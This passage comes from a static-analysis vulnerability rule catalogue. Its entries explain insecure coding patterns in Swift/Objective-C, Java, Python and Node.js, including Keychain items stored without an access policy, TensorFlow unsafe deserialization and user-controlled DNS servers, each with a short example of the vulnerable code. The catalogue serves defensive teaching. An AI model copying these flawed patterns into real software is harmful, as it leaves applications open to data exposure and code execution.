[14] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0.1 Requirement 3.3.1, Requirement 3.3.2, Requirement 3.3.3, Requirement 3.5.1, Requirement 4.2.2, Requirement 6.2.4, Requirement 8.3.1
desc.dataflow.objc.insecure_storage_unspecified_keychain_access_policy
Abstract
The identified method stores data in the Keychain without specifying an accessibility level.
Explanation
When storing data into the Keychain, an accessibility level needs to be set up which defines when it will be possible to access the item. The possible accessibility levels include:

-kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly:
The data in the Keychain item cannot be accessed after a restart until the device has been unlocked once by the user.
After the first unlock, the data remains accessible until the next restart. This is recommended for items that need to be accessed by background applications. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

-kSecAttrAccessibleAlways:
The data in the Keychain item can always be accessed regardless of whether the device is locked.
This is not recommended for application use. Items with this attribute migrate to a new device when using encrypted backups.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly:
The data in the Keychain can only be accessed when the device is unlocked. Only available if a passcode is set on the device.
This is recommended for items that only need to be accessible while the application is in the foreground. Items with this attribute never migrate to a new device. After a backup is restored to a new device, these items are missing. No items can be stored in this class on devices without a passcode. Disabling the device passcode causes all items in this class to be deleted.
Available in iOS 8.0 and later.

-kSecAttrAccessibleAlwaysThisDeviceOnly:
The data in the Keychain item can always be accessed regardless of whether the device is locked.
This is not recommended for application use. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenUnlocked:
The data in the Keychain item can be accessed only while the device is unlocked by the user.
This is recommended for items that need to be accessible only while the application is in the foreground. Items with this attribute migrate to a new device when using encrypted backups.
This is the default value for Keychain items added without explicitly setting an accessibility constant.
Available in iOS 4.0 and later.

-kSecAttrAccessibleWhenUnlockedThisDeviceOnly:
The data in the Keychain item can be accessed only while the device is unlocked by the user.
This is recommended for items that need to be accessible only while the application is in the foreground. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.
Available in iOS 4.0 and later.

When Keychain protections were first introduced, the default value was kSecAttrAccessibleAlways, which created a security problem since someone that can get access or steal your device will be able to read the contents of the Keychain. Currently, the default attribute is kSecAttrAccessibleWhenUnlocked, which is a reasonably restrictive default. However, Apple's public documentation disagrees about what the default attribute is supposed to be, so just in case, you should set this attribute explicitly on all Keychain items.

Example 1: In the following example the Keychain item is stored without clearly specifying an accessibility level which may behave differently on different iOS versions:


...
// Configure Keychain Item
let token = "secret"
var query = [String : AnyObject]()
query[kSecClass as String] = kSecClassGenericPassword
query[kSecValueData as String] = token as AnyObject?

SecItemAdd(query as CFDictionary, nil)
...
References
[1] Keychain Services Apple
[2] Keychain Item Accessibility Constants Apple
[3] David Thiel iOS Application Security: The Definitive Guide for Hackers and Developers No Starch Press
[4] Standards Mapping - Common Weakness Enumeration CWE ID 359
[5] Standards Mapping - Common Weakness Enumeration Top 25 2019 [4] CWE ID 200
[6] Standards Mapping - Common Weakness Enumeration Top 25 2020 [7] CWE ID 200
[7] Standards Mapping - Common Weakness Enumeration Top 25 2021 [20] CWE ID 200
[8] Standards Mapping - Common Weakness Enumeration Top 25 2024 [17] CWE ID 200
[9] Standards Mapping - General Data Protection Regulation (GDPR) Insufficient Data Protection
[10] Standards Mapping - OWASP Application Security Verification Standard 4.0 8.2.2 Client-side Data Protection (L1 L2 L3), 8.3.4 Sensitive Private Data (L1 L2 L3), 10.2.1 Malicious Code Search (L2 L3)
[11] Standards Mapping - OWASP Mobile 2024 M9 Insecure Data Storage
[12] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-2, MASVS-STORAGE-2
[13] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0 Requirement 3.3.1, Requirement 3.5.1, Requirement 4.2.2, Requirement 6.2.4, Requirement 8.3.1
[14] Standards Mapping - Payment Card Industry Data Security Standard Version 4.0.1 Requirement 3.3.1, Requirement 3.3.2, Requirement 3.3.3, Requirement 3.5.1, Requirement 4.2.2, Requirement 6.2.4, Requirement 8.3.1
desc.dataflow.swift.insecure_storage_unspecified_keychain_access_policy
Abstract
Implementing the NSURLConnectionDelegate.connection(_:willSendRequestFor:) delegate callback method will make the system ignore the NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) and NSURLConnectionDelegate.connection(_:didReceive:) methods.
Explanation
The NSURLConnectionDelegate.connection(_:willSendRequestFor:) delegate method allows the delegate to make an informed decision about connection authentication at once. If the delegate implements this method, it has no need to implement NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) or NSURLConnectionDelegate.connection(_:didReceive:). In fact, these methods are not invoked, so any security checks on them will be ignored.
References
[1] connection(_:willSendRequestFor:) API documentation Apple
[2] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[3] Standards Mapping - OWASP API 2023 API2 Broken Authentication
[4] Standards Mapping - OWASP Mobile 2024 M3 Insecure Authentication/Authorization
[5] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-1
desc.structural.objc.authentication_bad_practice_ignored_authentication_method
Abstract
Implementing the NSURLConnectionDelegate.connection(_:willSendRequestFor:) delegate callback method will make the system ignore the NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) and NSURLConnectionDelegate.connection(_:didReceive:) methods.
Explanation
The NSURLConnectionDelegate.connection(_:willSendRequestFor:) delegate method allows the delegate to make an informed decision about connection authentication at once. If the delegate implements this method, it has no need to implement NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) or NSURLConnectionDelegate.connection(_:didReceive:). In fact, these methods are not invoked, so any security checks on them will be ignored.
References
[1] connection(_:willSendRequestFor:) API documentation Apple
[2] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[3] Standards Mapping - OWASP API 2023 API2 Broken Authentication
[4] Standards Mapping - OWASP Mobile 2024 M3 Insecure Authentication/Authorization
[5] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-1
desc.structural.swift.authentication_bad_practice_ignored_authentication_method
Abstract
A program capable of creating a circular link in a data structure can cause stack exhaustion when the data structure is processed recursively.
Explanation
Using recursion is a staple for creating and managing linked data structures. Recursion also runs the risk of processing indefinitely if the data incorporates a circular link, which in turn will exhaust the stack and crash the program.

Example 1: The following code snippet demonstrates this vulnerability using Apache Log4j2.

Marker child = MarkerManager.getMarker("child");
Marker parent = MarkerManager.getMarker("parent");

child.addParents(parent);
parent.addParents(child);

String toInfinity = child.toString();


When child calls toString(), which includes a recursive processing method, it triggers a stack overflow exception (stack exhaustion). This exception occurs due to the circular link between child and parent.
References
[1] DOS-1: Beware of activities that may use disproportionate resources Oracle
[2] Standards Mapping - Common Weakness Enumeration CWE ID 674
[3] Standards Mapping - Payment Card Industry Software Security Framework 1.2 Control Objective C.3.3 - Web Software Attack Mitigation
desc.controlflow.java.code_correctness_stack_exhaustion
Abstract
Converting a byte array into a String may lead to data loss.
Explanation
When data from a byte array is converted into a String, it is unspecified what will happen to any data that is outside of the applicable character set. This can lead to data being lost, or a decrease in the level of security when binary data is needed to ensure proper security measures are followed.

Example 1: The following code converts data into a String in order to create a hash.


...
FileInputStream fis = new FileInputStream(myFile);
byte[] byteArr = byte[BUFSIZE];
...
int count = fis.read(byteArr);
...
String fileString = new String(byteArr);
String fileSHA256Hex = DigestUtils.sha256Hex(fileString);
// use fileSHA256Hex to validate file
...


Assuming the size of the file is less than BUFSIZE, this works fine as long as the information in myFile is encoded the same as the default character set, however if it's using a different encoding, or is a binary file, it will lose information. This in turn will cause the resulting SHA hash to be less reliable, and could mean it's far easier to cause collisions, especially if any data outside of the default character set is represented by the same value, such as a question mark.
References
[1] STR03-J. Do not encode noncharacter data as a string CERT
[2] When 'EFBFBD' and Friends Come Knocking: Observations of Byte Array to String Conversions GDS Security
[3] Standards Mapping - Common Weakness Enumeration CWE ID 486
desc.semantic.java.code_correctness_byte_array_to_string_conversion
Abstract
Comparing boxed primitives using equality operators instead of their equals() method can result in unexpected behavior.
Explanation
When dealing with boxed primitives, when comparing equality, the boxed primitive's equals() method should be called instead of the operators == and !=. The Java Specification states about boxing conversions:

"If the value p being boxed is an integer literal of type int between -128 and 127 inclusive, or the boolean literal true or false, or a character literal between '\u0000' and '\u007f' inclusive, then let a and b be the results of any two boxing conversions of p. It is always the case that a == b."

This means that if a boxed primitive is used (other than Boolean or Byte), only a range of values will be cached, or memoized. For a subset of values, using == or != will return the correct value, for all other values outside of this subset, this will return the result of comparing the object addresses.

Example 1: The following example uses equality operators on boxed primitives.


...
Integer mask0 = 100;
Integer mask1 = 100;
...
if (file0.readWriteAllPerms){
mask0 = 777;
}
if (file1.readWriteAllPerms){
mask1 = 777;
}
...
if (mask0 == mask1){
//assume file0 and file1 have same permissions
...
}
...


The code in Example 1 uses Integer boxed primitives to try to compare two int values. If mask0 and mask1 are both equal to 100, then mask0 == mask1 will return true. However, when mask0 and mask1 are both equal to 777, now mask0 == maske1 will return false as these values are not within the range of cached values for these boxed primitives.
References
[1] EXP03-J. Do not use the equality operators when comparing values of boxed primitives CERT
[2] Java Language Specification Chapter 5. Conversions and Contexts Oracle
[3] Standards Mapping - Common Weakness Enumeration CWE ID 754
[4] Standards Mapping - OWASP Application Security Verification Standard 4.0 11.1.7 Business Logic Security Requirements (L2 L3)
[5] Standards Mapping - SANS Top 25 2010 Risky Resource Management - CWE ID 754
desc.structural.java.code_correctness_comparison_of_boxed_primitive_types
Abstract
The NSURLConnection delegate handles authentication challenges without first verifying that the application knows how to handle the authentication challenge for a particular protection space.
Explanation
An NSURLProtectionSpace object represents a server or an area on a server, commonly referred to as a realm, that requires authentication.
When establishing a URL connection that requires authentication against a protection space, the NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) method will be called right before the call to the NSURLConnectionDelegate.connection(_:didReceive:) method that should perform the authentication. This allows the NSURLConnectionDelegate to inspect the protection space before attempting to authenticate against it. By returning true, the delegate indicates that it can handle the form of authentication, which it does in the subsequent call to connection(_:didReceive:). If your delegate does not implement this method and the protection space uses client certificate authentication or server trust authentication, the system will attempt to use the user's keychain to authenticate which may not be the desired behavior.
References
[1] connection(_:canAuthenticateAgainstProtectionSpace:) API documentation Apple
[2] URLProtectionSpace API documentation Apple
[3] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[4] Standards Mapping - OWASP API 2023 API2 Broken Authentication
[5] Standards Mapping - OWASP Mobile 2024 M3 Insecure Authentication/Authorization
[6] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-1
desc.structural.objc.authentication_bad_practice_missing_check_against_protection_space
Abstract
The NSURLConnection delegate handles authentication challenges without first verifying that the application knows how to handle the authentication challenge for a particular protection space.
Explanation
An NSURLProtectionSpace object represents a server or an area on a server, commonly referred to as a realm, that requires authentication.
When establishing a URL connection that requires authentication against a protection space, the NSURLConnectionDelegate.connection(_:canAuthenticateAgainstProtectionSpace:) method will be called right before the call to the NSURLConnectionDelegate.connection(_:didReceive:) method that should perform the authentication. This allows the NSURLConnectionDelegate to inspect the protection space before attempting to authenticate against it. By returning true, the delegate indicates that it can handle the form of authentication, which it does in the subsequent call to connection(_:didReceive:). If your delegate does not implement this method and the protection space uses client certificate authentication or server trust authentication, the system will attempt to use the user's keychain to authenticate which may not be the desired behavior.
References
[1] connection(_:canAuthenticateAgainstProtectionSpace:) API documentation Apple
[2] URLProtectionSpace API documentation Apple
[3] Standards Mapping - General Data Protection Regulation (GDPR) Access Violation
[4] Standards Mapping - OWASP API 2023 API2 Broken Authentication
[5] Standards Mapping - OWASP Mobile 2024 M3 Insecure Authentication/Authorization
[6] Standards Mapping - OWASP Mobile Application Security Verification Standard 2.0 MASVS-AUTH-1
desc.structural.swift.authentication_bad_practice_missing_check_against_protection_space
Abstract
Allowing unsafe deserialization in TensorFlow can enable arbitrary code execution through lambdas, posing significant security risks to applications.
Explanation
When using TensorFlow, enable_unsafe_deserialization() allows an attacker to deserialize lambdas or other Python callable objects. While this feature is useful for flexibility and restoring complex models, it opens up vulnerabilities if the serialized data can be.

Example 1: The following Python code illustrates how enabling unsafe deserialization can be exploited if the serialized data is not secure:

import tensorflow as tf

tf.keras.config.enable_unsafe_deserialization()

model = tf.keras.models.load_model('evilmodel_tf.keras')
model([])



This example demonstrates the potential danger when enable_unsafe_deserialization() is used without ensuring that the source of the data is completely secure.
desc.structural.python.dynamic_code_evaluation_unsafe_tensorflow_deserialization
Abstract
The program violates the Enterprise JavaBeans specification by using the class loader.
Explanation
The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container [1].

In this case, the program violates the following EJB guideline:

"The enterprise bean must not attempt to create a class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams."

A requirement that the specification justifies in the following way:

"These functions are reserved for the Enterprise Beans container. Allowing the enterprise bean to use these functions could compromise security and decrease the container’s ability to properly manage the runtime environment."
References
[1] Jakarta Enterprise Beans 4.0 Eclipse Foundation
[2] Standards Mapping - Common Weakness Enumeration CWE ID 578
desc.structural.java.ejb_bad_practices_use_of_classloader
Abstract
Allowing external control of DNS settings can lead to a disruption of service or unexpected application behavior.
Explanation
DNS Spoofing, also known as DNS Cache Poisoning, is a type of attack in which an attacker corrupts the DNS resolver's cache, leading it to return incorrect IP addresses. Using DNS spoofing, an attacker can redirect users to malicious websites without their knowledge. In the context of server-side JavaScript using Node.js, improper handling of DNS server settings can lead to security vulnerabilities.

Example 1: Consider a scenario where a Node.js application enables users to specify custom DNS servers. If this input is not properly validated and sanitized, an attacker can supply malicious DNS servers and implement DNS spoofing attacks.


const dns = require('dns');

// User-controlled input for DNS servers
const customDnsServers = from_user_controlled_input;

// Set custom DNS servers
dns.setServers(customDnsServers);


In this example, the customDnsServers variable is assigned a value derived from user-controlled input. This input is then used to set the DNS servers using dns.setServers(customDnsServers). If an attacker provides malicious DNS server addresses, they can direct the application to resolve domain names using their servers, which can return false IP addresses.
desc.dataflow.javascript.dns_spoofing